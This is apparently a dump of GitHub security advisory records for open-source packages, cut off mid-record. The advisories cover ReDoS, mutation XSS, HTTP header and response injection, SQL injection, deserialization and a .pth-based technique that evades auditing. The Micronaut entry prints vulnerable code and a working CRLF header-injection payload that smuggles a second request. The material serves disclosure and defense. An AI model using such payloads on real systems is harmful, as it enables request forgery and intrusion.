+1.4.0,GHSA-pcqq-5962-hvcw,2020-03-10T16:48:58Z,2020-03-10T18:02:49Z,,[],Denial of Service in uap-core when processing crafted User-Agent strings,"### Impact
+Some regexes are vulnerable to regular expression denial of service (REDoS) due to overlapping capture groups. This allows remote attackers to overload a server by setting the User-Agent header in an HTTP(S) request to maliciously crafted long strings.
+
+### Patches
+Please update `uap-ruby` to >= v2.6.0
+
+### For more information
+https://github.com/ua-parser/uap-core/security/advisories/GHSA-cmcx-xhr8-3w9p
+
+Reported in `uap-core` by Ben Caller @bcaller",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'user_agent_parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ua-parser/uap-ruby/security/advisories/GHSA-pcqq-5962-hvcw'}, {'type': 'WEB', 'url': 'https://github.com/ua-parser/uap-ruby/commit/2bb18268f4c5ba7d4ba0e21c296bf6437063da3a'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-10T16:48:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m6xf-fq7q-8743,2022-10-07T13:07:17Z,2020-03-24T15:06:32Z,,['CVE-2020-6816'],mutation XSS via whitelisted math or svg and raw tag in Bleach,"### Impact
+
+A [mutation XSS](https://cure53.de/fp170.pdf) affects users calling `bleach.clean` with all of:
+
+* the `svg` or `math` in the allowed/whitelisted tags
+* an RCDATA tag (see below) in the allowed/whitelisted tags
+* the keyword argument `strip=False`
+
+### Patches
+
+Users are encouraged to upgrade to bleach v3.1.2 or greater.
+
+### Workarounds
+
+* modify `bleach.clean` calls to use `strip=True`, or not whitelist `math` or `svg` tags and one or more of the following tags:
+
+```
+script
+noscript
+style
+noframes
+xmp
+noembed
+iframe
+```
+
+* A strong [Content-Security-Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) without `unsafe-inline` and `unsafe-eval` [`script-src`s](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src)) will also help mitigate the risk.
+
+### References
+
+* https://bugzilla.mozilla.org/show_bug.cgi?id=1621692
+* https://cure53.de/fp170.pdf
+* https://nvd.nist.gov/vuln/detail/CVE-2020-6816
+* https://www.checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach
+
+### Credits
+
+* Reported by [Yaniv Nizry](https://twitter.com/ynizry) from the CxSCA AppSec group at Checkmarx
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Open an issue at [https://github.com/mozilla/bleach/issues](https://github.com/mozilla/bleach/issues)
+* Email us at [security@mozilla.org](mailto:security@mozilla.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'bleach'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mozilla/bleach/security/advisories/GHSA-m6xf-fq7q-8743'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-6816'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2020-4277'}, {'type': 'WEB', 'url': 'https://github.com/mozilla/bleach/releases/tag/v3.1.2'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EDQU2SZLZMSSACCBUBJ6NOSRNNBDYFW5/'}, {'type': 'WEB', 'url': 'https://www.checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-23T22:25:38Z', 'nvd_published_at': '2020-03-24T22:15:00Z'}"
+1.4.0,GHSA-694p-xrhg-x3wm,2021-10-06T21:44:23Z,2020-03-30T20:54:55Z,,['CVE-2020-7611'],CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request Header Injection'),"### Vulnerability
+
+Micronaut's HTTP client is vulnerable to ""HTTP Request Header Injection"" due to not validating request headers passed to the client.
+
+Example of vulnerable code:
+
+```java
+@Controller(""/hello"")
+public class HelloController {
+
+ @Inject
+ @Client(""/"")
+ RxHttpClient client;
+
+ @Get(""/external-exploit"")
+ @Produces(MediaType.TEXT_PLAIN)
+ public String externalExploit(@QueryValue(""header-value"") String headerValue) {
+ return client.toBlocking().retrieve(
+ HttpRequest.GET(""/hello"")
+ .header(""Test"", headerValue)
+ );
+ }
+}
+```
+
+In the above case a query value received from a user is passed as a header value to the client. Since the client doesn't validate the header value the request headers and body have the potential to be manipulated.
+
+For example, a user that supplies the following payload, can force the client to make multiple attacker-controlled HTTP requests.
+
+```java
+List headerData = List.of(
+ ""Connection: Keep-Alive"", // This keeps the connection open so another request can be stuffed in.
+ """",
+ """",
+ ""POST /hello/super-secret HTTP/1.1"",
+ ""Host: 127.0.0.1"",
+ ""Content-Length: 31"",
+ """",
+ ""{\""new\"":\""json\"",\""content\"":\""here\""}"",
+ """",
+ """"
+);
+String headerValue = ""H\r\n"" + String.join(""\r\n"", headerData);;
+URI theURI =
+ UriBuilder
+ .of(""/hello/external-exploit"")
+ .queryParam(""header-value"", headerValue) // Automatically URL encodes data
+ .build();
+HttpRequest request = HttpRequest.GET(theURI);
+String body = client.toBlocking().retrieve(request);
+```
+
+Note that using `@HeaderValue` instead of `@QueryValue` is not vulnerable since Micronaut's HTTP server does validate the headers passed to the server, so the exploit can only be triggered by using user data that is not an HTTP header (query values, form data etc.).
+
+### Impact
+
+The attacker is able to control the entirety of the HTTP body for their custom requests.
+As such, this vulnerability enables attackers to perform a variant of [Server Side Request Forgery](https://cwe.mitre.org/data/definitions/918.html).
+
+### Patches
+
+The problem has been patched in the `micronaut-http-client` versions 1.2.11 and 1.3.2 and above.
+
+### Workarounds
+
+Do not pass user data directly received from HTTP request parameters as headers in the HTTP client.
+
+### References
+
+Fix commits
+- https://github.com/micronaut-projects/micronaut-core/commit/9d1eff5c8df1d6cda1fe00ef046729b2a6abe7f1
+- https://github.com/micronaut-projects/micronaut-core/commit/6deb60b75517f80c57b42d935f07955c773b766d
+- https://github.com/micronaut-projects/micronaut-core/commit/bc855e439c4a5ced3d83195bb59d0679cbd95add
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Open an issue in [micronaut-core](https://github.com/micronaut-projects/micronaut-core)
+* Email us at [info@micronaut.io](mailto:info@micronaut.io)
+
+### Credit
+
+Originally reported by @JLLeitschuh
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.micronaut:micronaut-http-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.micronaut:micronaut-http-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-694p-xrhg-x3wm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7611'}, {'type': 'WEB', 'url': 'https://github.com/micronaut-projects/micronaut-core/commit/6deb60b75517f80c57b42d935f07955c773b766d'}, {'type': 'WEB', 'url': 'https://github.com/micronaut-projects/micronaut-core/commit/9d1eff5c8df1d6cda1fe00ef046729b2a6abe7f1'}, {'type': 'WEB', 'url': 'https://github.com/micronaut-projects/micronaut-core/commit/bc855e439c4a5ced3d83195bb59d0679cbd95add'}, {'type': 'PACKAGE', 'url': 'https://github.com/micronaut-projects/micronaut-core'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-IOMICRONAUT-561342'}]","{'cwe_ids': ['CWE-444'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-03-30T20:54:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qfc5-mcwq-26q8,2021-08-19T22:13:44Z,2020-03-12T17:02:50Z,,['CVE-2019-18874'],Double Free in psutil,psutil (aka python-psutil) through 5.6.5 can have a double free. This occurs because of refcount mishandling within a while or for loop that converts system data into a Python object.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'psutil'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.6.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-18874'}, {'type': 'WEB', 'url': 'https://github.com/giampaolo/psutil/pull/1616'}, {'type': 'WEB', 'url': 'https://github.com/giampaolo/psutil/commit/7d512c8e4442a896d56505be3e78f1156f443465'}, {'type': 'WEB', 'url': 'https://github.com/giampaolo/psutil/blob/master/HISTORY.rst#566'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2019/11/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2P7QI7MOTZTFXQYU23CP3RAWXCERMOAS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OLETTJYZL2SMBUI4Q2NGBMGPDPP54SRG/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4204-1/'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-12T17:02:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-33vf-4xgg-9r58,2023-05-16T16:16:20Z,2020-03-03T23:33:16Z,,['CVE-2020-5249'],HTTP Response Splitting (Early Hints) in Puma,"### Impact
+If an application using Puma allows untrusted input in an early-hints header, an attacker can use a carriage return character to end the header and inject malicious content, such as additional headers or an entirely new response body. This vulnerability is known as [HTTP Response Splitting](https://owasp.org/www-community/attacks/HTTP_Response_Splitting).
+
+While not an attack in itself, response splitting is a vector for several other attacks, such as cross-site scripting (XSS).
+
+This is related to [CVE-2020-5247](https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v), which fixed this vulnerability but only for regular responses.
+
+### Patches
+This has been fixed in 4.3.3 and 3.12.4.
+
+### Workarounds
+Users can not allow untrusted/user input in the Early Hints response header.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [puma](https://github.com/puma/puma)
+* Email us a project maintainer. [Email addresses are listed in our Code of Conduct](https://github.com/puma/puma/blob/master/CODE_OF_CONDUCT.md#enforcement).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.12.4'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/puma/puma/security/advisories/GHSA-33vf-4xgg-9r58'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5249'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/commit/c22712fc93284a45a93f9ad7023888f3a65524f3'}, {'type': 'PACKAGE', 'url': 'https://github.com/puma/puma'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puma/CVE-2020-5249.yml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BMJ3CGZ3DLBJ5WUUKMI5ZFXFJQMXJZIK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DIHVO3CQMU7BZC7FCTSRJ33YDNS3GFPK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NJ3LL5F5QADB6LM46GXZETREAKZMQNRD/'}, {'type': 'WEB', 'url': 'https://owasp.org/www-community/attacks/HTTP_Response_Splitting'}]","{'cwe_ids': ['CWE-113', 'CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-02T15:03:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g6j2-ch25-5mmv,2021-01-08T20:24:58Z,2020-03-25T16:52:49Z,,['CVE-2020-5261'],Missing Token Replay Detection in Saml2 Authentication services for ASP.NET,"### Impact
+Token Replay Detection is an important defence in depth measure for Single Sign On solutions. In all previous 2.X versions, the Token Replay Detection is not properly implemented.
+
+Note that version 1.0.1 is not affected. It has a correct Token Replay Implementation and is safe to use.
+
+### Patches
+The 2.5.0 version is patched.
+
+### Workarounds
+There are no workarounds with existing versions. Fixing the issue requires code updates.
+
+### References
+https://en.wikipedia.org/wiki/Replay_attack
+
+### For more information
+If you have any questions or comments about this advisory:
+* Comment on #711.
+* Email us at [security@sustainsys.com](mailto:security@susatinsys.com) if you think that there are further security issues.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Sustainsys.Saml2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Sustainsys/Saml2/security/advisories/GHSA-g6j2-ch25-5mmv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5261'}, {'type': 'WEB', 'url': 'https://github.com/Sustainsys/Saml2/issues/711'}, {'type': 'WEB', 'url': 'https://github.com/Sustainsys/Saml2/commit/e58e0a1aff2b1ead6aca080b7cdced55ee6d5241'}]","{'cwe_ids': ['CWE-294'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-25T01:16:34Z', 'nvd_published_at': '2020-03-25T02:15:00Z'}"
+1.4.0,GHSA-738m-f33v-qc2r,2020-03-05T21:57:18Z,2020-03-05T22:09:19Z,,['CVE-2015-8476'],SMTP Injection in PHPMailer,"### Impact
+Attackers could inject arbitrary SMTP commands via by exploiting the fact that valid email addresses may contain line breaks, which are not handled correctly in some contexts.
+
+### Patches
+Fixed in 5.2.14 in [this commit](https://github.com/PHPMailer/PHPMailer/commit/6687a96a18b8f12148881e4ddde795ae477284b0).
+
+### Workarounds
+Manually strip line breaks from email addresses before passing them to PHPMailer.
+
+### References
+https://nvd.nist.gov/vuln/detail/CVE-2015-8476
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.14'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-738m-f33v-qc2r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-8476'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/commit/6687a96a18b8f12148881e4ddde795ae477284b0'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2015-8476.yaml'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.14'}, {'type': 'WEB', 'url': 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177130.html'}, {'type': 'WEB', 'url': 'http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177139.html'}, {'type': 'WEB', 'url': 'http://www.debian.org/security/2015/dsa-3416'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2015/12/04/5'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2015/12/05/1'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/78619'}]","{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-03-05T21:57:18Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vg44-fw64-cpjx,2021-08-23T14:40:05Z,2020-03-24T15:08:59Z,,[],Incorrect Account Used for Signing,"### Impact
+
+Anybody using this library to sign with a BIP44 account other than the first account may be affected. If a user is signing with the first account (i.e. the account at index `0`), or with the legacy MEW/MyCrypto HD path, they are not affected.
+
+The vulnerability impacts cases where the user signs a personal message or transaction without first adding the account. This includes cases where the user has already added the account in a previous session (i.e. they added the account, reset the application, then signed something). The serialization/deserialization process does restore a previously added account, but it doesn't restore the index instructing the keyring to use that account for signing. As a result, after serializing then deserializing the keyring state, the account at index `0` is always used for signing even if it isn't the current account.
+
+### Patches
+
+This has been patched ([#14](https://github.com/MetaMask/eth-ledger-bridge-keyring/pull/14)) in version >=0.2.1 of [`eth-ledger-bridge-keyring`](https://www.npmjs.com/package/eth-ledger-bridge-keyring), and in version >=0.2.2 of [`@metamask/eth-ledger-bridge-keyring`](https://www.npmjs.com/package/@metamask/eth-ledger-bridge-keyring). Users are encouraged to migrate to the new package name.
+
+### Workarounds
+
+To work around this problem without updating, you should remove then re-add the account before use. As long as the account was added during the lifetime of that process, signing with that account should work correctly.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Open an issue in [MetaMask/eth-ledger-bridge-keyring on GitHub](https://github.com/MetaMask/eth-ledger-bridge-keyring)
+* Email the MetaMask team at [hello@metamask.io](mailto:hello@metamask.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'eth-ledger-bridge-keyring'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@metamask/eth-ledger-bridge-keyring'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/MetaMask/eth-ledger-bridge-keyring/security/advisories/GHSA-vg44-fw64-cpjx'}, {'type': 'WEB', 'url': 'https://github.com/MetaMask/eth-ledger-bridge-keyring/pull/14'}, {'type': 'WEB', 'url': 'https://github.com/MetaMask/eth-ledger-bridge-keyring/commit/f32e529d13a53e55f558d903534d631846dc26ce'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-vg44-fw64-cpjx'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ETHLEDGERBRIDGEKEYRING-561121'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1497'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1498'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-23T23:11:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2p5p-m353-833w,2021-01-08T20:25:54Z,2020-03-13T21:05:44Z,,['CVE-2020-5257'],Sort order SQL injection in Administrate,"In Administrate (rubygem) before version 0.13.0, when sorting by attributes on a dashboard,
+the direction parameter was not validated before being interpolated into the SQL query.
+This could present a SQL injection if the attacker were able to modify the `direction` parameter and bypass ActiveRecord SQL protections.
+
+Whilst this does have a high-impact, to exploit this you need access to the Administrate dashboards, which we would expect to be behind authentication.
+
+This is patched in wersion 0.13.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'administrate'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.13.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/thoughtbot/administrate/security/advisories/GHSA-2p5p-m353-833w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5257'}, {'type': 'WEB', 'url': 'https://github.com/thoughtbot/administrate/commit/3ab838b83c5f565fba50e0c6f66fe4517f98eed3'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-2p5p-m353-833w'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/administrate/CVE-2020-5257.yml'}]","{'cwe_ids': ['CWE-943'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-13T21:05:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xf8c-3cgx-fcwm,2021-04-23T20:26:37Z,2020-03-12T16:54:06Z,,['CVE-2019-10138'],Improper Access Control in novajoin,"A flaw was discovered in the python-novajoin plugin, all versions up to, excluding 1.1.1, for Red Hat OpenStack Platform. The novajoin API lacked sufficient access control, allowing any keystone authenticated user to generate FreeIPA tokens.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'novajoin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10138'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10138'}, {'type': 'WEB', 'url': 'https://review.opendev.org/#/c/631240/'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-03-12T16:53:49Z', 'nvd_published_at': '2019-07-30T17:15:00Z'}"
+1.4.0,GHSA-wh37-37xw-54hr,2022-03-23T20:33:22Z,2020-03-10T18:02:31Z,,['CVE-2014-8650'],Improper Authentication in requests-kerberos,python-requests-Kerberos through 0.5 does not handle mutual authentication,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'requests-kerberos'}, 'ecosystem_specific': {'affected_functions': ['requests_kerberos.HTTPKerberosAuth.handle_response']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-8650'}, {'type': 'WEB', 'url': 'https://github.com/requests/requests-kerberos/issues/35'}, {'type': 'WEB', 'url': 'https://github.com/requests/requests-kerberos/pull/36'}, {'type': 'WEB', 'url': 'https://github.com/mkomitee/requests-kerberos/commit/9c1e08cc17bb6950455a85d33d391ecd2bce6eb6'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-8650'}, {'type': 'PACKAGE', 'url': 'https://github.com/mkomitee/requests-kerberos'}, {'type': 'WEB', 'url': 'https://github.com/requests/requests-kerberos/blob/0.6/HISTORY.rst'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2014-8650'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2014/11/07/1'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/70909'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-03-06T20:11:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7q25-qrjw-6fg2,2022-03-11T23:01:36Z,2020-03-24T15:07:56Z,,['CVE-2020-5252'],Malicious package may avoid detection in python auditing,"# Python Auditing Vulnerability
+
+Demonstrates how a malicious package can insert a load-time poison pill to avoid detection by tools like Safety.
+
+Tools that are designed to find vulnerable packages can not ever run in the same python environment that they are trying to protect.
+
+## Usage
+
+Install `safety`, `insecure-package`, and this package with pip in the same python environment. Order doesn't matter.
+
+1. pip install safety
+2. pip install insecure-package
+3. pip install dist/malicious-0.1-py3-none-any.whl
+
+Run the check
+
+4. `safety check`
+
+You should see both `Running my modified safety.check` and that `insecure-package` is not listed in the results!
+
+
+## How it Works
+
+Everything in Python is mutable. The trick is getting some code to run at interpreter load time in order to do some patching.
+
+1. When you install this package, the `setup.py` settings installs a `malicious.pth` file to your `site-packages` directory.
+2. The `malicious.pth` file gets loaded anytime Python starts, which in turn imports our `malicious` package.
+3. The `malicious/__init__.py` patches the safety library with a custom function to avoid detection.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'safety'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pyupio/safety/security/advisories/GHSA-7q25-qrjw-6fg2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5252'}, {'type': 'WEB', 'url': 'https://github.com/akoumjian/python-safety-vuln'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyupio/safety'}, {'type': 'WEB', 'url': 'https://mulch.dev/blog/CVE-2020-5252-python-safety-vuln/'}, {'type': 'WEB', 'url': 'https://pyup.io/posts/patched-vulnerability/'}]","{'cwe_ids': ['CWE-807'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-03-23T23:07:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4w82-r329-3q67,2023-06-08T19:02:11Z,2020-03-04T20:52:14Z,,['CVE-2020-8840'],Deserialization of Untrusted Data in jackson-databind,"FasterXML jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5 and 2.9.x before 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.6.7.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.6.7.3'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.9.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.7.9.6'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.11.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.8.11.4'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8840'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2620'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/74aba4042fce35ee0b91bd2847e788c10040d78b'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/9bb52c7122271df75435ec7e66ecf6b02b1ee14f'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218@%3Cdev.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 